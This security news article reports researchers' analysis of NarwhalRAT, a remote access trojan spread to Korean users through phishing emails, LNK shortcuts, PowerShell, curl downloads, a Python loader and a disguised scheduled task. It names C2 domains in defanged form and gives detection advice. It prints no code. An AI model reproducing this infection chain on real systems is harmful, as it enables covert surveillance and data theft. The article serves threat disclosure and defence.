NarwhalRAT Malware Targets Korean Users via Spear-Phishing and Python Loader
A spear-phishing campaign abuses LNK files, PowerShell, and a Python loader to deploy the NarwhalRAT remote access trojan against Korean users.
A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception. Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch.
The infection begins with a spear phishing email pretending to be an urgent security alert from the “Microsoft Account Team.” The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document. Analysts at Genians Security Center said in a report shared with Cyber Security News that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026.
Researchers named the malware NarwhalRAT, drawing on the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea. The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns Hidden and System file attributes to the created folder to stay out of plain sight. It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting.
The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder. When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment variable substring substitution to hide the real commands, dynamically rebuilding strings like “powershell” and “curl.exe” at runtime to evade static detection.
After deobfuscation, the LNK file launches PowerShell with execution policy bypassed and uses a copied curl.exe to download two files from the relay server. The first is a decoy HWP document opened to keep the victim unsuspecting, while the second is a batch script named KHjWFcuS.bat that performs next-stage installation in a hidden window. This technique of abusing built-in tools is classified as Living-off-the-Land. The batch file downloads the official Python embedded package to make the activity look like a normal software installation, renaming Pythonw.exe to usersscreen.exe to suppress any console window.
For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” running at one-minute intervals, mimicking a legitimate Microsoft task to avoid administrative scrutiny. A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload. Once the payload executes in memory through fileless execution, NarwhalRAT reveals itself as a fully featured Remote Access Trojan. It first checks for virtual machine environments including VMware, VirtualBox, and Parallels Desktop to avoid sandbox analysis, a tactic typical of APT-level malware.
The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes. Keystroke data is temporarily stored before being transmitted in batches, reducing real-time detection chances. From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse based on LNK and PowerShell, and security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.